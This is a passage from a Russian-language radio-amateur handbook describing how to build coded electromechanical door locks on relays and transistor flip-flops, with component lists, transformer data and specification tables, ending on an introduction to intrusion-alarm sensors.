Дешифратор изготавливается в виде прямоугольной пластмассовой конструкции, в которой монтируются кнопочные переключатели S2, S10—S16. Устанавливается дешифратор на входной двери и соединяется с релейным блоком и сетью электропитания монтажным проводом и электрическим многожильным кабелем. В качестве кнопочных переключателей используются малогабаритные кнопки КМ, предназначенные для коммутации электрических цепей с активной нагрузкой постоянного тока от 0, 0005 до 3 А и напряжением от 0, 5 до 250 В и имеющие износостойкость не менее 10 000 циклов переключении типа КМ1-1.

Для изготовления сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: переключатели S1 типа П1Т-1-1 или П2К с контактами на размыкание, S2 — кнопка звонковая, работающая на замыкание контактов только при нажатии на нее, S3—S9 — МТ1, S10—S16 — КМ1-1 или КП-1, S17 — КМ1-1, КП-1, МТ1; ЭМ1 типа ЭП 41/33 или самодельный, конструкция которого рассмотрена выше; электрический звонок ВА1 любого типа с электропитанием от сети переменного тока напряжением 220 В частотой 50 Гц; электромагнитные реле К.1—К.7 типа МКУ-48 или любые другие реле также с питанием от сети переменного тока напряжением 220 В, имеющие контактные пары, которые работают на замыкание и на размыкание; плавкий предохранитель F1 любого типа на ток срабатывания 1 А; электрический соединитель X1 типа «вилка».

Как следует из принципиальной схемы, код сторожевого устройства состоит из семи цифр 1—7, принцип кодирования которых заключается в следующем. Контакты переключателей S3—S9 устанавливаются в такое положение, чтобы при нажатии соответствующих кнопок срабатывали реле и своими контактами замыкали электрическую цепь питания ИМ ЭМ1. В положении контактов переключателей, показанных на схеме, набран код 1345.

Набор шифра производится в любое время и по желанию хозяина объекта ручками переключателей. В зависимости от положения пар контактов переключателей можно подать сигнал на срабатывание ИМ при нажатии одной, двух, трех и т. д. кнопок S10—S16 — это зависит от положения ручек управления переключателей S3—S9.

После того как собран блок реле с кодирующим узлом, рекомендуется у всех ручек управления переключателей S3—S9 сделать гравировку или надписи цифрами от 1 до 7, в порядке возрастания номеров. Если переключателю S3 присвоена цифра 1, то S4 — цифра 2, S5 — цифра 3 и т. д. Такие же номера необходимо выгравировать или сделать надписи у кнопок дешифратора, установленного на входной двери охраняемого объекта.

Срабатывает сторожевое устройство следующим образом. Сначала нажимается первая кнопка, соответствующая переключателю S10, и переменное напряжение сети подается на обмотку первого реле К1, которое контактами К1.1 самоблокируется, а контактами К. 1. 2 подключит обмотку ИМ к контактам 1 и 3 переключателя S3. Затем необходимо нажать кнопку под номером 3 для того, чтобы сработало реле КЗ и своими контактами КЗ.1 заблокировало питание, а контактами КЗ. 2 обеспечило дальнейшую подготовку цепи ИМ к подаче электропитания.

Если нажать вторую кнопку и подать напряжение питания на обмотку реле К2, то произойдет самоблокировка питания этого реле контактами К2. 1 и размыкание контактов К2. 2, которые разорвут электрическую цепочку, и ни при каком дальнейшем наборе цифр кода ИМ не получит питания.

Для того чтобы сторожевое устройство сработало, необходимо последовательно нажать кнопки 4 и 5, контакты которых позволят замкнуть цепь питания ИМ ЭМ1. Блокировочная кнопка S2 подает напряжение питания на электрический звонок и имеет обычную схему включения. Вторая блокировочная кнопка S1 возвращает схему сторожевого устройства в исходное положение. Эту кнопку можно установить скрытно или на входной двери. При скрытном положении кнопки ее контакты должны быть разомкнуты и включаются только в момент перед дешифровкой. В этом случае сторожевое устройство в ждущем режиме находится в обесточенном состоянии, но открыть входную дверь невозможно. Если кнопка переключателя устанавливается на входную дверь, то при открывании двери контакты этого переключателя разрываются, а при закрывании двери вся система возвращается в исходное состояние и готова к приему нового посетителя.

Радиолюбители должны заинтересоваться установкой и размещением еще одной дополнительной кнопки S17, с помощью которой можно управлять сторожевым устройством на значительном расстоянии от входной двери. Ее можно установить и внутри объекта и снаружи, но обязательно в укромном месте. С ее помощью можно подавать напряжение питания на ИМ и приводить его сердечник в действие.

Рациональная компоновка конструктивных элементов сторожевого устройства и выполнение требований эстетики и эргономики позволит домашнему мастеру изготовить всё устройство компактным и удобным в эксплуатации. Одно главное требование: верхняя лицевая планка, на которой укрепляются кнопки дешифратора и которая выступает над поверхностью двери, должна быть выполнена из стали толщиной не менее 4 мм, а сами кнопки должны быть глубоко утоплены и не иметь люфта в отверстиях.

Правильно собранное сторожевое устройство в налаживании и регулировке не нуждается и начинает работать сразу же после установки на место.

Основные электрические параметры

и технические характеристики сторожевого устройства

на электромагнитных реле

Номинальное напряжение питающей сети

переменного тока, В..................... 220

Номинальная частота питающей сети

переменного тока, Гц.................... 50

Коэффициент нелинейных искажений питающей сети

переменного тока, %, не более.............. 10

Пределы изменения напряжения питающей сети

переменного тока, %, не более.............. ±10

Пределы изменения частоты питающей сети

переменного тока, %, не более.............. ±1

Напряжение срабатывания реле, В............ 187

Напряжение отпускания реле, В.............. 63

Сопротивление изоляции токоведущих элементов

между собой и корпусом устройства, МОм...... 10

Суммарное время нахождения обмоток реле

под напряжением, ч, не более............... 100

Количество одновременно охраняемых объектов, шт. 1 Срок службы устройства, ч, не менее........... 5000

Вероятность безотказной работы, не менее....... 0, 92

кпд, %, не менее........................ 80

Максимальная мощность устройства, Вт........ 100

Условия эксплуатации:

температура окружающей среды, °С ........ —40...+50

относительная влажность воздуха при температуре 35 °С, % не менее................ 95+ -3

атмосферное давление воздуха, мм рт. cт...... 200... 900

 

t91.jpg

Рис. 3.17. Принципиальная схема сторожевого устройства на семи электромагнитных реле.

Рис. 3.17. Принципиальная схема сторожевого устройства на семи электромагнитных реле.

Изображение: 

3. 12. Сторожевое устройство на трех триггерах

3.12. СТОРОЖЕВОЕ УСТРОЙСТВО НА ТРЕХ ТРИГГЕРАХ

Сторожевое устройство, выполненное на ППП, предназначено для автоматического открывания механического замка, имеющего пружинную защелку. Замок устанавливается на входных дверях охраняемых объектов и срабатывает при правильном наборе установленного кода. Открывание дверей осуществляется после набора закодированного числа, состоящего из трех цифр от 1 до 10. Срабатывание устройства обеспечивается в строго определенной последовательности, так же, как срабатывают триггеры.

Принципиальная электрическая схема сторожевого устройства приведена на рис. 3.18, которая включает в себя следующие функциональные узлы, блоки и электрические цепи: входное устройство, сетевой понижающий трансформатор питания Т1, выпрямительное устройство, ИМ, кодирующее устройство и дешифратор, электронный автомат, собранный на ППП, выходные цепи, соединяющие устройство с механическим замком и дешифратором.

Подключение сторожевого устройства к сети переменного тока производится с помощью электрического соединителя X1 типа «вилка», смонтированного с электрическим кабелем. Работает сторожевое устройство от сети переменного тока напряжением 220 В частотой 50 Гц. Плавкие предохранители F1 и F2, установленные на входе, защищают устройство от коротких замыканий и перегрузок, возникающих иногда из-за допущенных при монтаже ошибок или из-за неисправных комплектующих элементов. Предохранители рассчитаны на ток срабатывания 1 А.

Во входной цепи установлен емкостный фильтр, собранный на конденсаторах С1 и С2 и защищающий устройство от низкочастотных помех, которые проникают в электрическую сеть от работы различных электротехнических устройств и механизмов. Включение и выключение

электропитания осуществляется с помощью двухпозиционного переключателя S1, о чем сигнализирует неоновая лампа H1.

В качестве сетевого понижающего трансформатора питания Т1 выбран унифицированный трансформатор ТПП, все типоразмеры которого применяются для питания ycройств на ППП. Особенностью трансформаторов типа ППП является низкие напряжение, действующее на вторичных обмотках. Конструкция трансформатора способна противостоять механическим и климатическим воздействиям, указанным в первой главе справочника. Она способна сохранять работоспособность при повышенной влажности и во всех случаях температурных воздействий обеспечивать необходимый запас электрической прочности изоляции обмоток с учетом категорий размещения трансформатора. Изготавливается трансформатор на ленточном магнитопроводе типономинала ШЛМ25Х25, который рассчитан на уменьшенный расход медного обмоточного провода.

Вместо покупного трансформатора можно применить самодельный, изготовленный на магнитопроводе типа Ш25Х25 или УШ25Х32 по данным, которые приведены в табл. 3.16. На выводах вторичных обмоток покупного трансформатора действует переменное напряжение при подключенной нагрузке следующих значений: 11 и 12 — 4,98 В; 13 и 14 — 4,98 В; 15 и 16 — 20 В; 17 и 18 — 20 В;

19 и 20 — 1,34 В; 21 и 22 — 1,34 В. Мощность трансформатора равна 57 Вт.

Сетевой понижающий трансформатор выполняет функции трансформации напряжения, гальванической развязки вторичных цепей от сети электропитания, обеспечения расчетного значения выпрямленного напряжения постоянного тока и безопасной эксплуатации сторожевого устройства.

При изготовлении самодельного трансформатора необходимо особое внимание обратить на качество обмоточного провода, при этом сопротивление изоляции должно быть не менее 20 МОм.

При намотке провода на катушку используется рядовая укладка с изоляцией каждого слоя друг от друга. В качестве изоляционного материала используется кабельная бумага или тонкая лакоткань. Наиболее прочная изоляция должна быть выполнена между первичной обмоткой, экраном и вторичной обмоткой. Самодельный транс-

Таблица 3. 16. Моточные данные сетевою понижающего трансформатора питания Т1, примененного в сторожевом устройстве на трех триггерах

3-121.jpg

форматор можно изготовить по упрощенной схеме, выполнить одну первичную обмотку с выводами 2 и 9, рассчитанную на подключение к сети переменного тока напряжением 220 В. Затем намотать один слой экранного провода с изоляцией между слоями и намотать одну вторичную обмотку, на которой при холостом ходе должно действовать переменное напряжение 26 В. Сопротивление изоляции между всеми токоведущими элементами и магнитопроводом должно быть не менее 10 МОм при относительной влажности воздуха до 90% при температуре 25 °С.

Выпрямительное устройство собрано на четырех диодах VD1-VD4 и конденсаторе СЗ, который является фильтром, сглаживающим пульсации выпрямленного напряжения постоянного тока. Выпрямитель выполнен по однофазной двухполупериодной мостовой схеме, которая характеризуется как положительными, так и отрицательными параметрами. К положительным относятся: повышенная частота пульсации на выходе выпрямителя постоянного тока, достаточно низкое обратное напряжение на комплекте выпрямительных диодов, полное использование габаритной мощности сетевого трансформатора. Котрицательным — повышенные потери и более низкий кпд по сравнению с другими выпрямительными схемами, невозможность установки диодов на одном металлическом теплоотводе без изоляционных прокладок, повышенный расход комплектующих ЭРЭ и более высокая стоимость изготовления. На выходе выпрямителя в точках А и Б под нагрузкой действует постоянное напряжение 24 В.

Далее по схеме в устройстве собран электронный блок на девяти транзисторах биполярного типа. Все транзисторы устанавливаются на печатную плату, за исключением транзистора VT1. В устройстве использованы транзисторы малой мощности, которые относятся к ППП третьего поколения, являются наиболее дешевыми по стоимости комплектующими ЭРЭ данного типа.

В составе электронного блока сторожевого устройства работают три транзисторных триггера и один усилитель тока. Первый триггер выполнен на транзисторах VT8 и VT9, второй — на транзисторах VT5 и VT6, третий — на транзисторах VT3 и VT4. Двухкаскадный усилитель тока собран на транзисторах VT1 и VT2.

Транзисторные триггеры относятся к классу полупроводниковых автоматических устройств, которые характеризуются тем, что могут сохранять длительное время одно из двух своих крайних состояний устойчивого равновесия и скачкообразно переключаться по электрическому сигналу из одного крайнего состояния в другое. В исходном состоянии сторожевого устройства транзисторы VT9, VT6 и VT4 триггеров открыты и потенциал на их коллекторах равен нулю. При включении электропитания это положение транзисторов достигается за счет заряда конденсатора С4 через резистор R17.

Порядок срабатывания сторожевого устройства при дешифровке установленного кода определяется подачей сигналов на триггеры. В данном случае первый триггер всегда срабатывает первым при замыкании контактов соответствующего кнопочного переключателя. Второй триггер срабатывает после первого триггера также после замыкания контактов кнопочного переключателя и зависит от установленного шифра. Третий триггер срабатывает вслед за вторым триггером.

На принципиальной схеме (рис. 3.18) показан установленный шифр 492. Первая цифра кода 4 определена номером кнопочного переключателя S4, контакты которого соединены через перемычку между соединителями Х8 и Х9 с базой транзистора VT8 первою триггера. Таким образом, первый триггер (транзисторы VT8 и VT9), перемычка между электрическими соединителями Х8 и Х9 и переключатель S4 определяют первую цифру будущего кода. Если установить перемычку между соединителями Х8 и любым другим соедини гелем, например с Х15, то первая цифра кода будет 7. Вторая цифра кода определяется цепочкой S9, Х19, Х18, база транзистора VT5. Третья цифра кода зависит от соединений элементов база транзистора VT7, резистор R9, база транзистора VT3, электрические соединители Х4, Х5 и перемычка между ними, переключатель кнопочный S2. Итак, рабочими контактами соединителей являются Х8, Х18 и Х4, остальные контакты соединителей Х2, Х6,Х10,Х12, Х14, Х16, Х20 — холостые, они соединены между собой параллельно. При монтаже сторожевого устройства возможны другие варианты соединений указанных контактов соединителей.

В составе устройства предусмотрен электромагнит, включенный в коллекторную цепь транзистора VT1 и рассчитанный на работу от постоянного тока напряжением 24 В. Срабатывает электромагнит ЭМ1 только после правильного набора трехзначного кода. При нажатии на кнопку S4, соответствующую первой цифре установленного кода, на базу транзистора VT8 подается отрицательный потенциал рабочего напряжения, который приводит к отпиранию этого транзистора. В это же время транзистор VT7 и выпрямительный диод VD6 закрываются. Следовательно, первый триггер после нажатия на кнопку S4 переключился в другое состояние. Теперь, если будет правильно нажата вторая кнопка S9, второй триггер также перейдет во второе устойчивое состояние. При нажатии на кнопку S2 переключится и третий триггер, то есть транзистор VT4 закроется, сработает усилитель тока, так как транзисторы VT2 и VT1 откроются. Это состояние триггеров и усилителя тока позволит в автоматическом режиме подать напряжение на электромагнит, который сработает и откроет замок входной двери. Для того чтобы вернуть сторожевое устройство в исходное состояние, необходимо разорвать цепь электропитания или переключателем S1 или дополнительным переключателем, устанавливаемым на входной двери (на схеме не указан).

При изготовлении устройства использованы следующие комплектующие ЭРИ и ЭРЭ: транзисторы VT1 типа П214, VT2 — МП25, VT3 - VT9 — МП42; сетевой понижающий трансформатор питания Т1 типа ТПП269 127/220-50; электрические соединители X1 типа «вилкам с электрическим кабелем, Х2 Х21 — КМЗ-1 приборные; плавкие предохранители F1 и F2 типа ПМ 1-1 А; индикаторная лампа Н1 типа ТН-0,2; выпрямительные диоды VD1-VD4 типа Д226Б, VD5-Д9Б, VD6-Д9Б; конденсаторы С1 типа МБМ-II-750В-0,01 мкФ,С2 МБМ-11-750В-0,01 мкФ, СЗ К50-6-50В-200 мкФ, С4 — К53-1А-6В-0.5 мкФ;

резисторы R1 типа МЛТ-2-390 кОм, R2 — МЛТ-0,25-91 кОм, КЗ - МЛТ-0,25-300 Ом, R4 — МЛТ-0,25-1 кОм, R5 — МЛТ-0,25 6,8 кОм, R7 — МЛТ-0,25-10 кОм, R8 — МЛТ-0,25-3,9 кОм, R9 — МЛТ-0,25-750 Ом, R10 — МЛТ-0,25-10 кОм, R11 — МЛТ-0,25 3,9 кОм, R 12 - МЛТ-0,25-10 кОм, R13 — МЛТ-0,25-3,9 к0м,R14 — МЛТ-0,25-10 кОм,R15 — МЛТ-0,25-3,9 к0м,R16— МЛТ-0,25-10 кОм, R17 — МЛТ-0,25-3,9 кОм, R18 — МЛТ-0,25-10 кОм; переключатели S11 типа П2Т-1-1, S2—S10 — КМ1-1;

электромагнит ЭМ1 или соленоид самодельной конструкции.

При сборке и регулировке сторожевого устройства можно произвести замену некоторых ЭРЭ. Например, электрические переключатели типа КМ1-1 можно заменить на переключатели типа КП-1, КП-2, ТВ2-1; резисторы типа МЛТ — на ВС, ВСа, МТ, БЛП, С2-10, С2-ЗЗН, Р1-4; конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20. О замене транзисторов рассказано в первой главе.

Основные электрические параметры и технические характеристики сторожевого устройства на трех триггерах

Номинальное напряжение питающей сети

переменного тока, В .................... .220

-Номинальная частота питающей сети

переменного тока, Гц ................... .50

Номинальное напряжение постоянного тока

на выходе выпрямителя под нагрузкой, В ....... 24

Коэффициент нелинейных искажений питающей сети

переменного тока, %, не более .............. 12

Пределы изменения напряжения питающей сети

переменного тока, В ..................... 187...242

Пределы изменения частоты питающей сети

переменного тока, % .................... ± 1

Пределы изменения напряжения постоянною тока

для питания электронной схемы, В .......... .22...26

Максимальный ток, на выходе выпрямителя, А .... 1,5

Ток, потребляемый устройством во время

срабатывания устройства. А, не более ........ .0,5

Количество одновременно охраняемых объектов, шт. 1

Время срабатывания устройства после набора

правильного кода, мс, не более ............. 0,8

Количество колируемых знаков, шт............ 3

Количество вариантов набора кода, шт, более..... 100 000

Срок службы, ч, не менее .................. 5000

Вероятность безотказной работы при риске заказчика в=0,95, не менее ............... 0,95

Сопротивление изоляции между токоведущими элементами и металлическим корпусом, при нормальных условиях эксплуатации, МОм, не менее ........ 5

Помехозащищенность устройства при воздействии

внешнею электромагнитного поля, дБ, не менее . . 100

Мощность сетевого понижающего трансформатора

питания Т1,Вт, не менее ................. 57

Ток, потребляемый устройством в режиме ожидания, мА, не более......................... 40

Условия эксплуатации:

температура окружающей среды, С........ —35...+ 45

относительная влажность воздуху при температуре 25 °С, не более..................... 95±3

атмосферное давление воздуха, мм рт. ст...... 200... 1000

t101.jpg

Рис. 3.18. Принципиальная схема сторожевого устройства на трех триггерах.

 

Рис. 3.18. Принципиальная схема сторожевого устройства на трех триггерах.

Изображение: 

Таблица 3.16. Моточные данные сетевою понижающего трансформатора питания Т1, примененного в сторожевом устройстве на трех тригге

Изображение: 

3. 13. Электромеханическое сторожевое устройство на элекромагнитных реле

3. 13. ЭЛЕКТРОМЕХАНИЧЕСКОЕ СТОРОЖЕВОЕ УСТРОЙСТВО НА ЭЛЕКТРОМАГНИТНЫХ РЕЛЕ

Это сторожевое устройство относится к классу изделий дискретной автоматики, основу которых составляют электромеханические контакты, управляющие электромагнитным ИМ. Как правило, такие изделия представляют собой единую сторожевую систему, в которой подача напряжения на ИМ и его включение в действие происходят лишь при условии, что замыкания всех промежуточных контактов осуществляются точно в заданной последовательности. А включение ИМ в данном варианте устройства приводит к перемещению сердечника электромагнита и связанных с ним защелки или стопора ригеля механического замка, устанавливаемого на входной двери.

Сторожевое устройство предназначено для установки на входных дверях жилых домов и производственных объектов, а также на внутренних дверях офисов, складов, цехов, лабораторий и т. д. Устройство, смонтированное на внутренних дверях, разрешает свободный вход в помещение лицам, знающим зашифрованное число, и в любом случае предупреждает об открывании двери и наборе шифра. Попытки посторонних посетителей открыть замок простым перебором цифр не могут привести к положительному результату, так как количество вариантов шифра насчитывает десятки тысяч.

Устройство включает в свой состав очень маленькую номенклатуру комплектующих ЭРИ и ЭРЭ, и все они рассчитаны на жесткие условия эксплуатации. При правильной технологии изготовления и монтаже элементов как внутри блоков, так и всей наружной проводки устройство может эксплуатироваться в условиях УХЛ и ХЛ, при температуре окружающей среды до —35 °С и 45 °С, при относительной влажности воздуха при температуре 25 °С до 95% и при пониженном атмосферном давлении до 200 мм рт. ст.

Работает сторожевое устройство непосредственно от сети переменного тока напряжением 220 В частотой 50 Гц, и звонковая кнопка находится при замыкании контактов под высоким напряжением. Вторичный источник электропитания изготавливается в единой конструкции с релейным автоматом.

Принципиальная электрическая схема электромеханического сторожевого устройства на электромагнитных реле приведена на рис. 3. 19. Подключение устройства к сети электропитания осуществляется с помощью электрического соединителя X1 типа «вилка» или прямым подключением электрического кабеля к однофазной сети. В последнем случае электрический соединитель X1 из схемы исключается. На входе устройства установлены плавкие предохранители, защищающие его от коротких замыканий и перегрузок в цепях устройства. Для исключения ошибок и как следствие коротких замыканий необходимо использовать только проверенные комплектующие элементы и монтажные провода, сопротивление изоляции которых в нормальных условиях эксплуатации не менее 50 МОм.

В конструкции сторожевого устройства можно выделить такие узлы, как БП с релейным автоматом, входные цепи с электрическим звонком и емкостным фильтром, пульт управления и дешифратор, устанавливаемый на входной двери. Конденсатор С/ обеспечивает защиту от помех, проникающих в сеть питания как от работы внешних источников, так и от работы релейного переключателя при замыкании и размыкании контактов. Конденсатор сравнительно небольшой емкости устанавливается параллельно первичной обмотке сетевого трансформатора Т1

и рассчитан на напряжение 750 В. Характерной особенностью данного устройства является его высокая экономичность, так как в режиме ожидания оно не потребляет электроэнергии. Схема его включения содержит переключатели S1, S2 и S12 с разомкнутыми контактами. Одновременно необходимо обратить внимание на включение и работу электрического звонка. Как следует из схемы, электрический звонок включен автономно и его работа зависит от положения контактов переключателей S1 S2 и S12. Это условие изменится, если будет выбран другой шифр.

В положении, указанном на схеме, шифр устройства — 0987. Количество цифр в коде определяется количеством рабочих реле КЗ—Кб.

Для электропитания электромагнитных реле и ИМ в устройстве собрано выпрямительное устройство, на выходе которого действует постоянное напряжение 32 В под нагрузкой. Для понижения высокого сетевого напряжения применен сетевой понижающий трансформатор питания Т1 стержневой самодельной конструкции. Изготавливается трансформатор на магнитопроводе типа ПЛ или П с двумя катушками по данным, приведенным в табл. 3.17. Активная площадь поперечного сечения стержней магнитопровода должна быть не менее 5 см2. Магнитопровод стержневой конструкции трансформатора выполняется П-образной формы и имеет два стержня с катушками. На каждом стержне помещается половина витков первичной и половина витков вторичной обмоток. Они соединяются между собой последовательно, так, чтобы намагничивающие силы этих полуобмоток совпадали по направлению. Стержневые трансформаторы обладают значительно меньшей чувствительностью к внешним магнитным полям, так как знаки ЭДС помех, наводимых в двух катушках трансформатора, равны по величине, но противоположны по знаку, поэтому взаимно уничтожаются. Эти трансформаторы по сравнению с броневыми имеют меньшую индуктивность рассеяния (на каждой катушке только половина витков, и поэтому толщина катушки меньшая), меньшее внешнее электромагнитное поле (магнитодвижущая сила в отдельных катушках имеет равный знак).

Сетевой трансформатор обеспечивает полную гальваническую развязку между вторичными цепями устройства и первичной сетью электропитания высокого напряжения,

Таблица 3. 17 Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электромеханическом сторожевом устройстве на электромагнитных реле

3-131.jpg

расчетное значение выпрямленного напряжения постоянного тока и более высокую электробезопасность.

Параллельно вторичным обмоткам сетевого трансформатора включен индикатор, который сигнализирует о срабатывании первого реле сторожевого устройства. Он выполнен на светодиоде VD1, VD2, R1. После замыкания контактов переключателя S1 и наборе установленного шифра на вторичной обмотке трансформатора Т1 появляется переменное напряжение около 30...35 В. Сразу же вспыхивает световой сигнализатор включения устройства.

Выпрямитель собран на четырех диодах средней мощности (на ток от 1 до 10 А) по классической однофазной двухполупериодной мостовой схеме, которая по сравнению с другими известными схемами выпрямителей характеризуется рядом положительных и отрицательных параметров: повышенной частотой пульсации выпрямленного напряжения постоянного тока; пониженным обратным напряжением на комплекте выпрямительных диодов;

достаточно высоким коэффициентом использования габаритной мощности сетевого трансформатора питания Т1;

повышенными потерями и более низким кпд; большим расходом диодов и вследствие этою повышенной стоимостью изготовления; невозможностью установки диодов на металлическом радиаторе охлаждения без изоляционных прокладок. Примененная схема выпрямителя наиболее распространена в радиолюбительской практике вследствие своей простоты, высоких электрических выходных параметров и надежной эксплуатации.

Выпрямитель работает на емкостную нагрузку (емкостный фильтр) на электролитическом конденсаторе С'2, который является фильтром, сглаживающим пульсации напряжения на выходе выпрямителя.

Как следует из схемы, релейный автомат с устройством кодирования и дешифрации собран на электромагнитных реле К1—К6, одно из которых является ИМ. Установка нового шифра производится следующим образом. На шифровальном поле, где собраны малогабаритные приборные клеммы Х2—Х43, металлическими перемычками соединяются соответствующие контакты рабочих реле, переключателей S3—S12 и вилки, подключаемые к соединителям с нечетными обозначениями приборных клемм (Х5, X11...Х43). На схеме вилки, подключенные к контактам обмоток рабочих реле, обозначены цифрами 1—4. Первой при наборе шифра подключается вилка с номером 1. Если необходимо набрать шифр 1479, то клемму (цифра 1) с проводником, идущим от реле К6, подключают к соединителю Х7, клемму от реле К5 — к Х19, клемму от реле К4 с цифрой 3 — к соединителю Х31. клемму от реле КЗ — к соединителю Х39. Последовательно соединяют Х5, Х17, Х29, Х37 с точкой А и положительным выводом источника питания. Далее так же последовательно соединяют выводы Х9, Х13, Х21, Х25, Х38 и Х41 с контактом 2 реле К2.1. Завершается кодирование параллельным соединением контактов X11, Х15, Х23, Х27, Х35, Х43 с обмоткой реле К.2, которое обеспечивает сброс при неправильном наборе кода.

После подключения устройства к сети переменного тока переключателем S1 нажимают одновременно на две кнопки, включающие питание звонка S2 и первого рабо чего реле (К6—S12). При шифре, показанном на схеме, срабатывает первое реле К16 замыкая свои контакты К6.1, блокирующие питание реле, и контакты К6.2, подготавливающие срабатывание второго рабочего реле К5. Это реле сработает после замыкания контактов 1 и 2 переключателя S11. При нажатии на кнопку этого переключателя срабатывает вторая цифра кода 9. Контакты К5.1 самоблокируют питание реле К5, а контакты К5.2 подготавливают следующее реле к очередному срабатыванию. После замыкания контактов переключателя S10 срабатывает реле К4, его контакты К4.1 самоблокируют питание реле К4, а контакты К4.2 подготавливают реле КЗ к работе. Таким образом, к этому моменту правильно набрана третья цифра кода. Далее замыкают контакты переключателя S9, срабатывает реле КЗ. Его контакты КЗ.1 самоблокируют питание этого реле, а контакты КЗ.2 подключают электромагнит ЭМ1 к выпрямителю постоянного тока. Итак, при последовательном нажатии на кнопки переключателей S12, S11, S10, S9 был набран ранее установленный код 0987.

Новый шифр 1479 может быть правильно набран при последовательном нажатии на кнопки переключателей S3, S6, S9, S11.

При изготовлении сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: выпрямительные диоды VD2 типа КД105Б, VD3—VD6 — Д242Б; светодиод VD1 типа АЛ307А; сетевой понижающий трансформатор стержневой конструкции Т1; предохранители F1, F2 типа ПМ-1-1 А; звонок электрический бытовой ВА1 любого типа с электропитанием от сети переменного тока напряжением 220 В; конденсаторы С1 типа МБМ-11-750В-0.1 мкФ, С2 — К50-6-50В-50 мкФ; электрические соединители X1 типа «вилка», Х2—Х43 — КМЗ-1; электромагнитные реле РЭС-10 (паспорт РС4.529.031-03).

Необходимо заметить, что при нажатии на кнопку S2 при замкнутых контактах переключателя S1 напряжение переменного тока будет подано на сетевой понижающий трансформатор питания и электрический звонок ВА1. После отпускания кнопки S2 устройство обесточится и придет в исходное состояние. Если при нажатии на кнопку S2 контакты переключателя S1 разомкнуты, то работать будет только электрический звонок в обычном режиме. После того как был правильно набран установленный код и замок откроется, трансформатор Т1 отключится от сети нажатием любой нерабочей кнопки. При неправильном наборе шифра и ошибке в порядке набора кода сторожевое устройство не сработает, а при нажатии на нерабочую кнопку, например S3, сработает реле К2, которое своими контактами К2.1 разорвет цепь питания электромагнитных реле и возвратит все устройство в начальное положение. Все ранее правильно набранные цифры кода будут сброшены.

При изготовлении сторожевого устройства можно произвести замену некоторых комплектующих ЭРЭ. Можно применить электромагнитные реле типа РЭС-10 (паспорт РС4.529.031-16, РС4.524.313, РС4.529.031-11), РЭС-22;

можно применить унифицированный сетевой понижающий трансформатор стержневой конструкции типа ТС-40-5 или типа ТПП208-127/220-50, ТПП307-127/220-50 ТПП270-127/220-50.

Конструктивно сторожевое устройство рекомендуется выполнить в виде двух самостоятельных сборочных единиц: устройства дешифрования и БП с шифровальными контактами. Электрический звонок работает в обычном режиме и устанавливается традиционным способом. Изменения в монтаже питания звонка показаны на схеме.

Основные электрические параметры сторожевого устройства приведены ниже. Условия эксплуатации обеспечиваются конструкцией устройства и должны отвечать требованиям для УХЛ.

Конструкция дешифратора сторожевого устройства включает в свой состав: малогабаритные переключатели S2—S12 и индикаторное устройство. Все остальные элементы схемы собраны в БП и соединены с дешифратором монтажными проводами. Дешифратор располагается на входной двери таким образом, чтобы обеспечивался доступ только к кнопкам управления, имеющим максимально утопленные контакты, которые не могут быть демонтированы и вскрыты. Конструктивные решения дешифраторов общеизвестны, широко применяются в кодовых замках, которые используются на входных дверях большинства общественных помещений и жилых зданий.

Следует еще раз обратить внимание мастеров-радиолюбителей на то, что, выполняя работы, связанные с электричеством, необходимо помнить основные правила безопасности.

Основные электрические параметры и технические характеристики электромеханического сторожевого устройства на электромагнитных реле

Номинальное напряжение питающей сети

переменного тока, В .................... 220

Номинальная частота питающей сети

переменного тока, Гц.................... 50

Номинальное напряжение питания электромагнитных

реле постоянным током, В................. 32

Коэффициент нелинейных искажений питающей сети

переменного тока, %, не более.............. 10

Пределы изменения напряжения питающей сети

переменного тока, В..................... 200... 240

Пределы изменения частоты питающей сети

переменного тока, Гц.................... 49, 5... 50, 5

Номинальное напряжение на выводах обмоток

сетевого трансформатора, В:

1 и 1', 2 и 2' ....................... .110

3 и 3', 4 и 4' ....................... .16

Количество одновременно охраняемых объектов, шт .1

Количество цифр в наборе кода, шт ........... .4

Срок службы, ч, не менее .................. .10 000

Вероятность безотказной работы устройства

при риске заказчика в=0,92, не менее ........ .0,98

Сопротивление изоляции между токоведущими частями

и металлическим корпусом, МОм, не менее .... .15

Помехозащищенность устройства при воздействии

внешнего электромагнитного поля, дБ, не менее . .110

кпд, %, не менее ....................... 96

t111.jpg

Рис. 3.19. Принципиальная схема электромеханического сторожевого устройства на электромагнитных реле.

 

Рис. 3.19. Принципиальная схема электромеханического сторожевого устройства на электромагнитных реле

Изображение: 

Таблица 3.17 Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электромеханическом сторожевом устро

Изображение: 

3. 2. Исполнительные устройства и датчики передачи инормации о проникновении на охраняемый объект

3. 2. ИСПОЛНИТЕЛЬНЫЕ УСТРОЙСТВА И ДАТЧИКИ ПЕРЕДАЧИ ИНФОРМАЦИИ О ПРОНИКНОВЕНИИ НА ОХРАНЯЕМЫЙ ОБЪЕКТ

После срабатывания многих типов сторожевых устройств и систем включаются звуковые, световые или электромеханические сигнализаторы, которые устанавливаются на охраняемом объекте или ЦПУ и являются составной частью электронной схемы. По этому принципу создано большинство существующих сторожевых устройств.

В условиях города наибольшую эффективность при охране объектов, особенно частных автомашин, можно достичь только при применении дублирующих устройств охраны и сигнализации, которые могут передавать информацию о вторжении на охраняемый объект на расстоянии до десятка километров. К таким устройствам относятся миниатюрные УКВ ЧМ передатчики, извещатели охранные объемные радиоволновые для подвижных средств и извещатели охранно-пожарные для стационарных объектов.

Из существующих и применяемых в качестве дополнительных источников информации рекомендуются следующие типы: "Штифт", «Лемур», «Аргус-2», "Аргус-2М", "Фобос", «Нева», «Рубин», «Сигнал», «Адемко», "Адемко-998" , "Фотон-4", «Дип-3»,«ИПД-01»,«Волна»,«Риф-М»,«ИПР-1»,«Эхо-2»,«СМК-1»,«СМК-3»,«Окно-2М»,Рубеж-3», «Вектор-2», «Вектор-3» и многие другие изделия.

Например, охрана закрываемых помещений может осуществляться с помощью извещателя сторожевой сигнализации типа «Волна-5», который относится к группе объемных радиоволновых устройств. Данное устройство, используемое в качестве датчика, предназначено для обнаружения лиц, проникающих в охраняемое закрытое помещение, и формирования тревожного извещения. Охранный извещатель «Волна-5» обеспечивает:

обнаружение посторонних лиц, вторгшихся в охраняемое помещение;

